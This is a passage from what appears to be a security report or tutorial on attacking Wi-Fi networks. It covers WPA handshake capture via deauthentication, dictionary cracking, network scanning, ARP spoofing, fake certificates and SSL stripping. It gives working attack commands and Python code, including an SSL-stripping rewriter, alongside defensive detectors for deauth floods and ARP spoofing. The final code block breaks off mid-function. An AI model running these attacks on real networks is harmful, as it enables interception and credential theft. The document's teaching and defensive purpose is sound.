this occurs frequently. The attacker would only need to wait patiently until a new computer
connects to the network.
Alternatively, if there are already clients connected to the network, an attacker can
deauthenticate them and force them to reconnect. This uses a simple deauth attack, which disrupts
the connection between the client and the AP. The client is disconnected momentarily and will
automatically attempt to reconnect. Since it already has the correct credentials, it will be
authenticated by the AP, and a brand new four-way handshake is generated. This happens almost
invisibly to the user, who might notice a brief period of disconnection. To perform the deauth
attack, we must know the address of one of the connected clients, which airmon-ng lists (in this case
00:1C:26:40:B1:8A). We must also be able to inject packets (see the injection test above). The
program used is aireplay-ng:
# aireplay-ng --deauth 25 -a 00:1B:2F:D5:2D:E6 -c 00:1C:26:40:B1:8A wlan1

The number after --deauth is the number of times aireplay-ng will repeat the attack. A higher
number increases the probability of it working, but is less stealthy.
If the client was successfully deauthenticated and then reconnected, airmon-ng will update its display
to show that it has captured a four-way handshake:

Figure 7. Capturing Handshake After a DeAuth (callouts: Acquired Handshake, DeAuth Attack)

In the above figure, the bottom screen shows the deauthentication attacks being conducted.
Airmon-ng has updated and shows in the upper right hand corner that the handshake has been
captured.
Once the handshake has been captured, the attacker can stop capturing packets. The
information contained in the handshake is all that is needed to crack the WPA passphrase.
Cracking the passphrase. Once the attacker has the handshake it is possible to crack the
passphrase through brute force or dictionary techniques. This technique uses a word list and goes
through each word one at a time, encrypting it with the other data gathered (the SSID) to see if it
matches. When a match occurs, the word from the list is the passphrase used.
This can be extremely time consuming, depending on the complexity of the passphrase and the
size of the dictionary file. An attacker is limited by his processor speed in how many passwords
he can try per second. With dictionary files containing billions and billions of different
combinations of letters and words, the process could take a very long time. Fortunately, most
consumers choose simple, easy to remember passphrases that can be recovered using smaller
dictionary files containing common names and passwords.
The program aircrack-ng can be used to crack the handshake. The attacker must have a word list
on his system. Backtrack includes several wordlists of different sizes, and larger ones can be
downloaded from the internet. The largest word list included with Backtrack is:
/pentest/passwords/wordlists/wpa.txt

This is a wordlist designed specifically for cracking WPA passphrases. It is 420 MB and contains
over 35 million different passwords - and this is a relatively small dictionary file!
To use this word list with aircrack-ng and our captured handshake:
# aircrack-ng -w /pentest/passwords/wordlists/wpa.txt flathers*.cap

The output will look like this while aircrack is trying the various passwords:

Figure 8. Dictionary Attack on WPA (callout: Current Location in Dictionary)

This gigantic dictionary file would take several days to be processed by my system. Normally an
attacker would be willing to leave his computer on for a few nights to crack the password. Since
I know that the passphrase for this network is in a smaller dictionary file, however, I used that to
quickly crack the password:

Figure 9. Cracking WPA Key (callout: Successful Key)

It only took 20 guesses into the dictionary file to discover a match. The correct passphrase was
deciphered: baseball.
The attacker now has the ability to connect to the network.
Speeding up the cracking process. Brute-force and dictionary attacks are processor intensive
and inefficient. For each word in the dictionary file, the computer must encrypt it with the
relevant data and then test to see if it matches. The encryption step for each word is the slowest
part. One way attackers quickly break passwords is through precomputed hash tables, also known
as rainbow tables. A rainbow table takes a word list and precomputes all of the encrypted
hashes. Once they are precomputed, it is extremely quick for software to locate a match. Rainbow
tables are extremely effective when the encryption method is known and static, such as Windows
passwords. However, because the WPA key is encrypted with both the passphrase and the SSID,
the tables are only effective if they were precomputed with the correct SSID. There are large
rainbow tables available for free online that were computed with the 1000 most common SSIDs.
This includes all the default SSIDs that most people don't bother to change. The file size is very
large, but if an attacker possesses it and the victim's SSID is among the 1000, it will only take him
a matter of minutes, if not seconds, to crack the password.
For example, in the above test, a standard dictionary attack on the passphrase processed about
115 passwords/second. When a rainbow table was computed with the SSID flathers-n and the
crack was run again, the computer processed 44,117 passwords/second!
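To make concrete why the SSID matters here, the following Python is an added example (not code from this report, and not aircrack-ng's own implementation) that derives the WPA/WPA2-Personal pairwise master key the way the standard specifies: PBKDF2-HMAC-SHA1 with the SSID as the salt, 4096 iterations, 32 bytes out. It builds a tiny precomputed table for one SSID and shows that the same passphrase on a different SSID misses entirely, and it works out the time to exhaust the 35-million-word list at the two guess rates reported above. The wordlist and the SSID linksys are constructed for the example; baseball and flathers-n are the values from this report.

```python
import hashlib

ITERATIONS = 4096   # fixed by the WPA/WPA2-Personal passphrase-to-PSK mapping
PMK_LEN = 32        # 256-bit pairwise master key


def wpa_psk_pmk(passphrase: str, ssid: str) -> bytes:
    """Map a passphrase and SSID to the 256-bit PMK (PBKDF2-HMAC-SHA1).

    The SSID is the salt, which is why the same passphrase yields a different
    PMK on every network and why a precomputed table is bound to one SSID.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 characters")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), ssid.encode("utf-8"),
        ITERATIONS, dklen=PMK_LEN)


def pmk_hex(passphrase: str, ssid: str) -> str:
    """Hex form of the PMK, convenient for comparing against published vectors."""
    return wpa_psk_pmk(passphrase, ssid).hex()


def build_pmk_table(ssid: str, wordlist) -> dict:
    """Precompute PMK -> word for one SSID (a tiny stand-in for a rainbow table).

    This is the expensive step described above: 4096 HMAC-SHA1 rounds per word.
    Once built, a lookup is a single dictionary access.
    """
    return {wpa_psk_pmk(word, ssid): word for word in wordlist}


def lookup_pmk(table: dict, pmk: bytes):
    """Return the passphrase behind a PMK, or None if the table does not have it."""
    return table.get(pmk)


def dictionary_runtime_hours(words: int, guesses_per_second: float) -> float:
    """Worst-case hours to exhaust a wordlist at a given guess rate."""
    return words / guesses_per_second / 3600.0


if __name__ == "__main__":
    # Constructed wordlist; "baseball" and "flathers-n" are the values from this report.
    wordlist = ["baseball", "football", "letmein1", "password"]
    table = build_pmk_table("linksys", wordlist)  # table for a common default SSID

    # Same passphrase, different SSID: the precomputed table misses.
    print(lookup_pmk(table, wpa_psk_pmk("baseball", "linksys")))
    print(lookup_pmk(table, wpa_psk_pmk("baseball", "flathers-n")))

    # Time to exhaust the 35-million-word list at the two rates reported above.
    print(round(dictionary_runtime_hours(35_000_000, 115), 1))
    print(round(dictionary_runtime_hours(35_000_000, 44_117), 2))
```

The derivation can be checked against the well-known test vector from the 802.11i standard (passphrase password, SSID IEEE). At 115 guesses per second the 35-million-word list takes about 84 hours; at 44,117 per second about 13 minutes, which is the gap between the two figures above.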
Protecting the network. WPA is far more secure than WEP and should be standard practice.
However, it is still vulnerable to dictionary attacks. The best way to prevent attacks is to use a
complex passphrase and avoid dictionary words. Also, because the key is encrypted with the
SSID as well, using a unique or random SSID will make it harder for an attacker to use a rainbow table.
Noticing unexpected and repetitive deauthentications could also be an indication that an attacker
is attempting to acquire the handshake.
The above technique only works for WPA when it is using a pre-shared key (PSK). There are
other forms of WPA that are much harder to crack. For example, WPA-AES uses a separate
encryption server to generate the passcodes. This makes it much more difficult (though not
impossible) for an attacker to gain access. However, this type of encryption is expensive and
difficult to set up and maintain, and is only really seen at the enterprise level.
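As an added defensive illustration (not part of the original report), the Python below shows what noticing unexpected and repetitive deauthentications can look like as detection logic. It reads a constructed log of 802.11 management frames, in a simple timestamp,subtype,bssid,station format assumed here for a monitor-mode sensor, and raises one alert when a single station receives a burst of deauthentication or disassociation frames within a short window. The BSSID and client address are those used in this report; the timestamps and the record format are made up.

```python
from collections import defaultdict, deque

# Constructed sample of 802.11 management-frame records, as a monitor-mode
# sensor might log them: timestamp,subtype,bssid,station. The BSSID and the
# station address are the ones used in this report; the timing is invented.
SAMPLE_FRAMES = """\
# ts,subtype,bssid,station
10.0,assoc_resp,00:1B:2F:D5:2D:E6,00:1C:26:40:B1:8A
45.2,deauth,00:1B:2F:D5:2D:E6,00:1C:26:40:B1:8A
300.0,deauth,00:1B:2F:D5:2D:E6,00:1C:26:40:B1:8A
300.1,deauth,00:1B:2F:D5:2D:E6,00:1C:26:40:B1:8A
300.2,deauth,00:1B:2F:D5:2D:E6,00:1C:26:40:B1:8A
300.3,deauth,00:1B:2F:D5:2D:E6,00:1C:26:40:B1:8A
300.4,deauth,00:1B:2F:D5:2D:E6,00:1C:26:40:B1:8A
300.5,deauth,00:1B:2F:D5:2D:E6,00:1C:26:40:B1:8A
301.0,assoc_resp,00:1B:2F:D5:2D:E6,00:1C:26:40:B1:8A
"""

DEAUTH_THRESHOLD = 5     # this many deauth/disassoc frames to one station ...
WINDOW_SECONDS = 10.0    # ... within this many seconds is treated as a flood


def parse_frame(line):
    """Split one constructed record into (ts, subtype, bssid, station)."""
    ts, subtype, bssid, station = line.strip().split(",")
    return float(ts), subtype, bssid.lower(), station.lower()


def detect_deauth_floods(lines, threshold=DEAUTH_THRESHOLD, window=WINDOW_SECONDS):
    """Flag (bssid, station) pairs that receive a burst of deauth/disassoc frames.

    A single deauthentication is normal (a laptop going to sleep, an AP
    rebooting). A burst aimed at one station, followed by a re-association, is
    the pattern left by the handshake-forcing technique described above.
    Returns a list of (bssid, station, frames_in_window, first_ts, last_ts),
    one entry per pair.
    """
    recent = defaultdict(deque)
    alerts, already = [], set()
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        ts, subtype, bssid, station = parse_frame(line)
        if subtype not in ("deauth", "disassoc"):
            continue
        q = recent[(bssid, station)]
        q.append(ts)
        while q and ts - q[0] > window:      # slide the window forward
            q.popleft()
        if len(q) >= threshold and (bssid, station) not in already:
            already.add((bssid, station))
            alerts.append((bssid, station, len(q), q[0], ts))
    return alerts


if __name__ == "__main__":
    for bssid, station, n, first, last in detect_deauth_floods(SAMPLE_FRAMES.splitlines()):
        print(f"deauth flood: {n} frames to {station} on {bssid} between t={first} and t={last}")
```

The single deauthentication at t=45.2 is ignored because it falls outside the window of the later burst; only the run starting at t=300.0 trips the threshold. The threshold and window are the knobs to tune against a given network's normal churn.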

INFORMATION GATHERING
Once an attacker has access to a wireless network, there are many different attacks and exploits
he can perform. To begin with, however, the attacker must have a clear understanding of the
network layout and what clients could be his potential victims.
There are many different programs that detect live hosts and map a network, and they range from
extremely stealthy to aggressive. Depending on how paranoid the attacker is or how well
monitored the network is, some scans may be better than others.
Passive scans. Network mapping software that is completely passive will only read incoming
packets and attempt to extrapolate any and all information about the network from them. They do
not send out any probes or requests. This takes longer to gather information, and may not give a
complete overview of the network, but the scans are virtually undetectable.
Included with Backtrack is a tool called lanmap. This is a completely passive scanner that just
sits and listens to network traffic. It then generates an image of what it guesses to be the network
map. This is a useful first step in determining the network layout, especially if the attacker is
being cautious about getting detected. The usage is:
# lanmap -i wlan1 -r 10 -T png

Wlan1 is the interface we want to use, the 10 is the refresh rate (in seconds) and png is the output
we want the network map to be. The longer lanmap runs, the more accurate it will be. Since it
only passively sniffs data there must be network activity for it to discover anything. Accordingly,
running this application late at night or when nobody is using the network will yield limited
results. After running this program for only a few minutes, lanmap was able to discover 2 live
hosts other than itself and printed a network map:

Figure 10. Passive Network Map (callouts: Gateway, Active Clients)

Aggressive scans. While passive scanning may be the stealthiest, it is the slowest and provides
the least amount of information. Several programs make use of active scans to discover hosts and
find out further information about them, such as open ports and running services.
Nmap is one of the most popular host and port scanning applications. It is included in Backtrack,
along with a GUI interface called Zenmap. Nmap has many different scan options ranging from
quick to slow and intensive. This differs from a passive scanner because Nmap will actively send
out request packets trying to contact other hosts. It will also probe ports to see if they are open.
This activity on a network is easy to spot if one is looking for it and larger, managed networks
are set up to notice these scans. However, for most small home or business wireless networks,
they will probably go undetected.
Nmap can perform a port search on a single IP or a range of IPs. When the attacker connects to
the network he will be able to see what subnet the network is operating on. A quick command to
identify the gateway and subnet is:
# netstat -ar

In the case of the flathers-n network the subnet is 10.0.0.*. This means that the IP address of
every connected device has to be within the range 10.0.0.1-255. For large networks, doing a port
scan of every available host is time consuming, so the first step is usually just to determine which
hosts are live with a quick scan:
# nmap -T4 -F 10.0.0.1-255

This will yield a quick search of hosts that are live, and any information nmap was able to gather
about them. For this search, 7 live hosts were found and nmap created a rudimentary network
topology:

Figure 11. Active Network Map (callouts: Our Machine, Gateway)

Notice that compared to the passive scan, nmap picked up a lot more live hosts. This is because
some of the hosts nmap discovered were not transmitting data when lanmap was run. Nmap
actively probed and searched and found these hosts.
Nmap is capable of much more intensive scans, such as finding open ports and running services.
This is extremely useful in locating potential vulnerabilities on certain clients to exploit.
Monitoring traffic. Another passive way to collect information from a network is by monitoring
traffic. Once the attacker is associated with the network, he can begin intercepting data packets
and reading them. This only works with WEP encrypted networks, however. Because the same
WEP key is shared between all clients, the attacker can decrypt packets sent from any client
using the one key.
If the wireless card is set to monitor mode, the program Wireshark can be used to read all
wireless packets on a certain channel. If you know the WEP key, Wireshark can decrypt the
packets it reads in this mode. This can be useful if the attacker does not want to actually join the
network and just wants to passively look at the traffic. If the attacker joins the network, however,
he can set up additional attacks that are much more effective in intercepting valuable data.

MAN IN THE MIDDLE ATTACKS


Once an attacker is connected to a wireless network, he can begin actively disrupting traffic and
gathering important information. One of the most common and most effective techniques is
known as a man-in-the-middle attack (MiTm). The name refers to the fact that the attacker places
his computer in between the two parties the traffic is meant to flow between, without either party realizing it.
Once he is in the middle of the traffic, he can execute a number of different attacks to gain
valuable information and wreak havoc on the network.

ARP SPOOFING
Address Resolution Protocol (ARP) is used to direct traffic on a network. It resolves IP addresses
to MAC addresses, so clients know where to send their data. For example, when a client wants
to send an HTTP request to the gateway, it uses ARP to see what MAC address is associated
with the gateway IP (in this case, 10.0.0.1).
When an attacker is connected to a wireless network, he can use ARP spoofing to redirect, or
even terminate, all network traffic. To become a man in the middle, he redirects all traffic
between two clients, or between a client and the gateway, so that it goes through him. The traffic
passes through his computer transparently to the end user.
ARP spoofing is the most essential man in the middle attack. Once traffic is redirected through
the attacker's computer, he can sniff the traffic for passwords or other information. It also sets
him up for more vicious attacks.
Spoofing Software. Backtrack comes with a program called arpspoof that makes it easy to set up
ARP spoofing and become a man in the middle. The first step is to make sure the system
will allow traffic to pass through the computer, by turning on IP forwarding. The following command
turns on IP forwarding:
# echo 1 > /proc/sys/net/ipv4/ip_forward

The next step is to put the attacking computer in between the traffic of a client and the gateway.
The gateway in this case is located at 10.0.0.1. We could set up an ARP spoof on the entire
network, which would route all network traffic from any source through our computer. However,
this can really bog the network down. It is more effective to target individual IP addresses. From
one of our earlier scans of the network, we also have the IP address of an active client on the
network (other than our own, obviously): 10.0.0.4. To begin ARP spoofing:
# arpspoof -i wlan0 -t 10.0.0.1 10.0.0.4 & arpspoof -i wlan0 -t 10.0.0.4 10.0.0.1

This executes two commands simultaneously. The first tells the gateway to send all traffic
destined for 10.0.0.4 to the attackers computer instead. The second tells the client to send all
traffic destined for the gateway to us.
The ARP tables on the victim's computer will change:

Figure 12. ARP Spoofing (callouts: Before Spoofing, After Spoofing)

The physical address of the default gateway was changed to the address of the attacker's system.
The victim's machine now directs all traffic to the attacker's system, thinking that it is the
gateway. The ARP tables on the gateway have changed as well.
Once the traffic is being redirected to our computer, we can begin to monitor it. Programs like
Wireshark can now be used to read the packets. A lot of valuable information is sent in plaintext,
including unencrypted usernames and passwords. Wireshark can also be set up to
read emails, chat logs, etc.
In this setup, any information sent over an unencrypted medium is readable by the attacker. This
includes HTTP, FTP, SMTP and many more. While useful information is often sent over these
insecure protocols, the really valuable information to an attacker, like important passwords and
login information, will be encrypted and sent over secure channels like SSL. It is still possible,
though, to exploit a man-in-the-middle attack to obtain this encrypted data.
Advanced Software. Ettercap is a multi purpose tool that is included with Backtrack that
automates many man in the middle techniques. It is a very flexible program that allows
customizable scripts and plugins to perform a multitude of attacks. In addition to being able to
perform ARP spoofing man in the middle attacks, Ettercap is also capable of other MiTm style
attacks, such as DHCP and DNS spoofs.
When ettercap is launched as a man in the middle ARP attack on a target, it automatically
redirects and forwards traffic, eliminating the need to do so manually. It also poisons the target's
ARP cache, meaning it changes the ARP data on the target for the duration of the attack. When
ettercap closes, it returns packet forwarding to normal and un-poisons the victim's ARP
cache. To perform a simple ARP poison MiTm attack on host 10.0.0.4 with the gateway
10.0.0.1, issue the following command:
# ettercap -i wlan1 -T -M ARP:REMOTE /10.0.0.1/ /10.0.0.4/

The -T parameter sets ettercap in text mode. Although it does have a GUI, like most applications
in Backtrack, it is most flexible from the command line. The -M option is for a man in the middle
attack, and ARP is the type of attack we want to perform. Adding REMOTE allows ettercap to sniff
remote connections beyond the gateway.
Once the attack is running, we can perform any number of information gathering techniques.
Ettercap also comes with plugins that can perform specific functions. A particularly useful one is
the ability to spoof DNS. The file /usr/share/ettercap/etter.dns can be configured to
redirect DNS host names to new IP addresses. When ettercap is running a MiTm attack and this
plugin is launched, ettercap will redirect all traffic according to the rules in the etter.dns file. This
is especially useful in getting the victim to visit malicious websites.

Perhaps the most useful feature of ettercap is its ability to fake authentication certificates. This
allows ettercap to intercept and read encrypted internet traffic, such as sensitive passwords and
banking information. This type of traffic is generally encrypted with SSL.

ENCRYPTED TRAFFIC
SSL Encryption. Secure Sockets Layer (SSL) was developed by Netscape in the nineties as a way
to communicate privately and share data. It has been replaced by a newer version called
Transport Layer Security (TLS), although it is still commonly referred to as SSL. It is a method
used to privately share data between any two communicating applications, though its most
notable use is sending encrypted data over the web. The standard protocols for submitting data
over the internet are not secure and can be read by anyone sniffing the packets. Secure websites
encrypt the sensitive data using SSL and use what is referred to as HTTPS, a secure form of
HTTP, generally over port 443.
When the client tries to connect via HTTPS it sends an initial handshake to the server, which
then responds. They exchange keys and can then start transmitting encrypted data back and forth
to each other. The most important part, however, is not the handshake, or the encryption, but
authenticating the server. A user needs to make sure he is actually creating a secure connection
with his real online bank, and not a look-a-like that will steal his data. To authenticate the server,
browsers use digital certificates.
When a customer tries to access a secure website, like their bank for example, before they
establish a secure connection they need assurance that the bank is who it says it is. So the
bank presents them with a digital certificate from a third party verifying that it is legitimate.
But to verify that the third party's certificate is legitimate as well, the third party also presents a
form of authentication. This chain of trust keeps leading upwards until it reaches a high-level,
well-trusted authority, referred to as a trust anchor. In a sense, every secure website is entangled
in a large web of trust that leads back up to a few very trusted, high-level authorities. If
a website's certificate falls on this chain of trust, the user can trust that the website is legitimate.
Fake Certificates. Since the encryption is nearly unbreakable with SSL, the vulnerability lies in
the authentication process. When an attacker gets in the middle of a client trying to securely
connect to a server, he can break the authentication up into 2 parts. Take the example of
accessing a bank. The man-in-the-middle can pretend to be the customer when communicating
with the bank. And when communicating with the user, he pretends to be the bank. If all worked
well, neither party would suspect a thing. This is the purpose of the digital certificate. The
attacker does not have the verified certificate that the bank has, so he cannot authenticate himself
to the user to initialize the secure connection.

However, programs like ettercap are capable of faking a certificate. The certificate imitates the
real one, but will not be fully verified. Whatever browser the customer is using will recognize
that the certificate is not official. It will warn the user that the certificate is not verified and ask if
they want to proceed. If the user accepts the certificate anyway, then a secure connection is
established with the attacker's machine. The victim believes they are directly connected to the
bank, but in reality they are sending all of their encrypted data directly to the attacker.
Ettercap has a certificate template built in and will automatically attempt to have the target
accept the certificate whenever it intercepts encrypted traffic. As an example, first start ettercap
in an ARP poisoning MiTm attack between the victim and the gateway:
# ettercap -i wlan1 -T -M ARP:REMOTE /10.0.0.1/ /10.0.0.4/

The program is now in the middle of all traffic between the victim and the outside internet. When
the victim goes to a secure website like https://www.bankofamerica.com, the real bank will
send over its certificate for verification. Ettercap will intercept this certificate and instead send its
own fake one to the victim. Depending on the browser the victim is using, a warning will pop up
similar to this:

Figure 13. Browser Warning (callout: Unverified Certificate)

The browser does not trust the connection (because it is really a connection to the attacker's
machine) and tries to warn the user. Many users, however, do not fully comprehend the meaning
or danger of an unverified certificate, and may attribute this warning to just a bug. If the user
clicks Add Exception, the browser will temporarily allow this certificate and establish a secure
(SSL) connection between the victim and the attacker's machine.
Now, when the victim submits his username and password on the banking website, they are
still being encrypted with SSL. Unfortunately, they are being encrypted using the attacker's key,
which means he, not the bank, can decrypt it. Once the attacker in the middle decrypts the
data, he can see the username and password in plain text.
Ettercap handles all of this automatically. It sniffs out encrypted usernames and passwords and
will display them in plain text on the attacker's computer. If it is left running for a period of time,
ettercap will even create a log file with all of the captured usernames and passwords for each site
the victim visited.
After intercepting the username and password, the attacker pretends to be the customer and
establishes a secure connection with the actual bank, then sends along the username and
password encrypted for the bank. The bank sees that it received the right username and password
and grants access, which is relayed back to the original victim. From both the victim's and the
bank's perspective, everything worked and was secure.
SSL Strip. Man in the middle attacks with fake certificates are fairly noticeable to the victim.
When he attempts to access a secure site, whatever browser he is using will display a large
warning that the certificate has not been verified. Many users, however, will click through the
warnings, especially if they have visited the site before. Some, though, will notice that something
is not right and immediately exit.
There is another MiTm attack that is even less noticeable to the user. When the victim is
accessing a secure website, like their bank, no warning will appear. This attack uses a tool
developed in 2009 called SSL Strip.
The principle behind SSL strip is that the attacker gets in the middle of communication
between a secure site (a bank) and the end user. The attacker creates the secure connection to the
bank instead of the user. As opposed to a fake certificate being sent to the user, in which a
warning would pop up, the attacker essentially strips the SSL from the website the victim is
accessing. For example, the main login page for an online bank may be something like
https://www.bankofamerica.com. Notice the protocol is HTTPS, so the connection is
secured by SSL. The program SSL strip intercepts this secure login page before it reaches the
user and replaces it with an identical looking page, minus the security. The user will see an
identical login page, but the address will be http://www.bankofamerica.com, lacking any form
of encryption.
When the victim inputs his username and password on this unsecure page, the information is sent
over standard HTTP in plaintext to the man in the middle machine. The attacker reads the
username and password in plaintext, and then encrypts it using the public SSL key it got from the
bank and forwards it on. The login goes through and the victim has access to the website, but all
subsequent traffic is unencrypted and readable by the attacker.
The main difference between an SSL strip and a fake certificate attack is the way data is
transferred between the victim and the attacker. In a fake certificate MiTm attack, the victim is
still encrypting his username and data, but instead of using the verified public key provided by
the bank, he is using a key created by the attacker. In an SSL strip attack, the victim is not
encrypting any data and is sending information in plaintext to the attacker. The connection
between the attacker and the secure website is the same in both attacks.
As opposed to the large warning about an unverified certificate, the only warning a victim will
have in an SSL strip attack is that he is using HTTP instead of HTTPS. A very observant user
may notice that the 's' is missing from the URL, but it is not likely, especially if they have used
the site many times before. Browsers also feature a small padlock icon to
indicate that encryption is being used. This is also missing in the attack, but SSL
strip can actually inject a fake secure icon to fool the user.
Using SSLStrip. SSL Strip is a free program that is included in Backtrack. To start the attack, the
first step is to allow packet forwarding, just as in a MiTm attack:
# echo 1 > /proc/sys/net/ipv4/ip_forward

Once packet forwarding is enabled, iptables must be configured to redirect HTTP traffic
through the SSL strip program:
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

What this step does is tell the attacker's machine to take any HTTP traffic on port 80 that it
intercepts between the victim and the gateway and redirect it to an arbitrary port, in this case 10000.
When SSL strip is running, it will listen on port 10000 for traffic and remove the SSL from any
secure web pages. Start the SSL strip program and tell it to listen on port 10000:
# sslstrip -p -l 10000

This starts the SSLStrip program and tells it to listen on port 10000 for traffic. The -p option
tells it to only capture username and passwords (as opposed to all SSL traffic).
The final step is to start the man in the middle attack so the attacker's computer can intercept the
data. This can be done using any of the techniques mentioned above, such as arpspoof
or ettercap. A fake certificate is not necessary when using SSLStrip, so arpspoof is the simpler
program:
# arpspoof -i wlan0 -t 10.0.0.1 10.0.0.3 & arpspoof -i wlan0 -t 10.0.0.3 10.0.0.1

sslstrip then rewrites the pages it forwards to the victim, replacing https:// links and
redirects with http:// ones while it keeps talking to the real server over SSL. This is what the
victim sees when directing their browser to a (supposedly) secure site:

[Figure 14. SSL Stripping: the victim's address bar shows http:// instead of https://]

Notice that the URL starts with http instead of the usual https. This is the only evidence that
something is different, and it is extremely easy for a user to overlook.
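The rewriting that sslstrip performs is simple enough to show in full. The block below is an added example written for this report, not sslstrip's own code: it downgrades every https:// link in a response body, does the same for a Location redirect, drops the Secure attribute from cookies (otherwise the browser would refuse to send them back over the plain-HTTP connection the attacker forced), removes a Strict-Transport-Security header, and remembers which host/path pairs were downgraded so the victim's later plain-HTTP requests for them can be fetched over HTTPS toward the real server. SAMPLE_BODY and SAMPLE_HEADERS are constructed for the demonstration and the hostnames are hypothetical.

```python
"""Core of SSL stripping, as an added example (not sslstrip's code).

The proxy sits between victim and server: it speaks HTTPS to the server,
plain HTTP to the victim, and rewrites everything in between so the
victim's browser never tries to open an SSL connection itself.
"""
import re
from urllib.parse import urlsplit

# any https:// URL up to the next quote, space or angle bracket
HTTPS_URL = re.compile(r'https://([^\s"\'<>]+)', re.IGNORECASE)
# the "; Secure" attribute of a Set-Cookie header
SECURE_ATTR = re.compile(r';\s*secure(?=;|\s*$)', re.IGNORECASE)


def _key(url: str):
    """(host, path) of a URL: the identity we track regardless of scheme."""
    parts = urlsplit(url)
    return parts.netloc.lower(), parts.path or "/"


class Stripper:
    def __init__(self):
        # (host, path) pairs the victim now sees as http:// links
        self.stripped = set()

    def strip_body(self, body: str) -> str:
        """Replace every https:// link with http:// and record it."""
        def downgrade(m):
            rest = m.group(1)
            self.stripped.add(_key("https://" + rest))
            return "http://" + rest
        return HTTPS_URL.sub(downgrade, body)

    def strip_headers(self, headers: dict) -> dict:
        """Rewrite the response headers that would re-secure the session."""
        out = {}
        for name, value in headers.items():
            lname = name.lower()
            if lname == "location" and value.lower().startswith("https://"):
                value = self.strip_body(value)      # redirect to HTTPS -> HTTP
            elif lname == "set-cookie":
                value = SECURE_ATTR.sub("", value)  # cookie must flow over HTTP
            elif lname == "strict-transport-security":
                # HSTS can only be removed before the browser has cached it;
                # a browser that already holds the policy refuses http:// here
                continue
            elif lname == "content-length":
                continue  # the body length changed; recompute before sending
            out[name] = value
        return out

    def upgrade_request(self, url: str) -> str:
        """URL the proxy must really fetch for a plain-HTTP request."""
        if url.lower().startswith("http://") and _key(url) in self.stripped:
            return "https://" + url[len("http://"):]
        return url


# constructed sample response (hypothetical hostnames)
SAMPLE_BODY = (
    '<html><body><a href="https://accounts.example.com/login">Sign in</a> '
    '<form action="https://accounts.example.com/login" method="post"></form> '
    '<a href="http://www.example.com/about">About</a></body></html>'
)
SAMPLE_HEADERS = {
    "Location": "https://accounts.example.com/login",
    "Set-Cookie": "sid=abc; Path=/; Secure; HttpOnly",
    "Strict-Transport-Security": "max-age=31536000",
    "Content-Length": "200",
}


def demo():
    """Run the sample through the stripper; returns (stripper, body, headers)."""
    s = Stripper()
    return s, s.strip_body(SAMPLE_BODY), s.strip_headers(SAMPLE_HEADERS)


if __name__ == "__main__":
    s, body, headers = demo()
    print(body)
    print(headers)
    print(s.upgrade_request("http://accounts.example.com/login"))
```

The Strict-Transport-Security branch is the important caveat for the defender's side: a site that sends that header is protected against this rewrite for every visitor whose browser has already seen it, since the browser then upgrades http:// to https:// itself before any request leaves the machine.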
When sslstrip sees a username and password in a stripped POST, it prints them in plaintext for
the attacker to read. By default sslstrip also writes everything it logs to a file (sslstrip.log) in the
directory it was started from. After running the program for a few minutes against the victim's
machine, the output looks like this:


Figure 15. Captured Passwords

The program captured the username and password for two secure sites the victim visited:
Gmail and Facebook. His Google login is victim1@usc.edu with password gmailpassword, and
his Facebook login is victim2@usc.edu with password fbpassword.

PROTECTING FROM MITM ATTACKS


The first step in preventing man in the middle attacks is to keep the attacker off the network.
For a MiTM attack to succeed, the attacker's computer must be able to communicate with both
the victim's machine and the gateway. Strong wireless encryption with a passphrase that is hard
to break is recommended, and monitoring the network for unauthorized devices can stop an attack
before it begins.
If an attacker does have network access, a few measures can hinder ARP spoofing. The most
direct defense is a static ARP entry for the gateway on each client (and for the clients on the
gateway). A static entry is not replaced by incoming ARP replies, so the forged replies from
arpspoof have nothing to overwrite. This is tedious to set up, however, as it must be configured
on every client and redone whenever the gateway's hardware, and with it its MAC address, changes.
There is also monitoring software (arpwatch, for example) that records the IP-to-MAC pairings it
sees and reports when the MAC address for a known IP changes. Such a change, or one MAC
suddenly answering for both the gateway and a client, alerts the user that somebody may be
attempting an ARP spoofing attack.
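The detection logic such a monitor runs is small, and the following added example (written for this report, not taken from arpwatch or any other tool) shows it over a constructed sequence of ARP replies with hypothetical addresses. It keeps the first MAC seen for each IP as the baseline and raises an alert when a later reply contradicts it, and it separately flags one MAC that claims more than one IP, which is what a single attacker poisoning both the gateway and a client looks like from the outside. A monitor only sees the replies that reach it, so in practice this runs on the host being protected (or on a mirror port), seeded with the gateway's known MAC.

```python
"""ARP spoof detection over observed (ip, mac) replies. Added example;
the replies in SAMPLE_REPLIES are constructed and the addresses are
hypothetical. 10.0.0.1 plays the gateway, 10.0.0.3 the victim, and the
MAC ending in :99 the attacker."""
from collections import defaultdict


class ArpMonitor:
    def __init__(self, trusted=None):
        # first-seen (or administratively known) IP -> MAC baseline
        self.table = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
        self.claims = defaultdict(set)   # MAC -> set of IPs it has answered for
        self.alerts = []
        self._fired = set()              # dedupe: one alert per (kind, subject)

    def _alert(self, key, msg):
        if key not in self._fired:
            self._fired.add(key)
            self.alerts.append(msg)

    def observe(self, ip, mac):
        """Feed one ARP reply 'ip is-at mac'."""
        mac = mac.lower()
        known = self.table.get(ip)
        if known is None:
            self.table[ip] = mac            # learn, never overwrite: the
        elif known != mac:                  # baseline must not be attacker-writable
            self._alert(("change", ip),
                        f"CHANGE {ip}: was {known}, now claimed by {mac}")
        self.claims[mac].add(ip)
        if len(self.claims[mac]) > 1:
            self._alert(("multi", mac),
                        f"MULTI {mac} answers for {sorted(self.claims[mac])}")

    def run(self, replies):
        for ip, mac in replies:
            self.observe(ip, mac)
        return list(self.alerts)


# constructed sample: normal traffic, then an arpspoof-style poisoning of
# both the gateway's and the victim's cache by the same attacker MAC
SAMPLE_REPLIES = [
    ("10.0.0.1", "aa:aa:aa:aa:aa:01"),   # gateway answers for itself
    ("10.0.0.3", "aa:aa:aa:aa:aa:03"),   # victim answers for itself
    ("10.0.0.2", "aa:aa:aa:aa:aa:02"),   # an uninvolved host
    ("10.0.0.1", "cc:cc:cc:cc:cc:99"),   # attacker: "gateway is at my MAC"
    ("10.0.0.3", "cc:cc:cc:cc:cc:99"),   # attacker: "victim is at my MAC"
    ("10.0.0.1", "cc:cc:cc:cc:cc:99"),   # repeated poisoning, no new alert
]


def detect(replies=SAMPLE_REPLIES, trusted=None):
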